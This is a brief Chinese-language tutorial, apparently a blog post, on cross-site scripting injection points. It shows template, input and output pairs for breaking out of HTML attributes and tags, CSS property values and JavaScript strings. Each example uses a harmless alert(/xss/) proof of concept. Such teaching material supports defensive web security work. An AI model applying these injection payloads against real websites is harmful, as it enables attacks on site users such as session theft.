xss输出在HTML、CSS、Javascript代码中
按输出点分类
4.1、输出在HTML标签中
XSS攻击Payload输出在HTML属性中时,攻击者需要在闭合相应的HTML属性后注入新
属性,或者在闭合标签后直接注入新标签eg:输入:" onclick="alert(/xxs/)
原型:<input name="user" value="{{ your input }}"/>
输出:<input name="user" value="" onclick="alert(/xss/)"/>
eg:输入:"><script>alert(/xss/)</script>
直接闭合input标签,注入新的script标签
输出:<input name="user" value=""><script>alert(/xss/)</script>"/>
4.2、输出在CSS代码中
XSS攻击Payload输出在CSS代码中时,攻击者需要闭合相应的CSS代码
eg:输入:#000; background-image: url('javascript:alert(/xss/)')
闭合前面的color属性,注入background-image属性
原型:
<style type="text/css">
body {
color: {{ your input }};
}
</style>
输出:
<style type="text/css">
body {
color: #000; background-image: url('javascript:alert(/xss/)');
}
</style>
4.3、输出在Javascript代码中
XSS攻击Payload输出在Javascript代码中时,攻击者需要闭合相应的Javascript代
码eg:输入:'+alert(/xss/)+'
闭合前面的单引号,注入攻击代码
原型:
<script>
var name='{{ your input }}';
</script>
输出:
<script>
var name=''+alert(/xss/)+'';
</script>
- 点赞
- 收藏
- 关注作者
评论(0)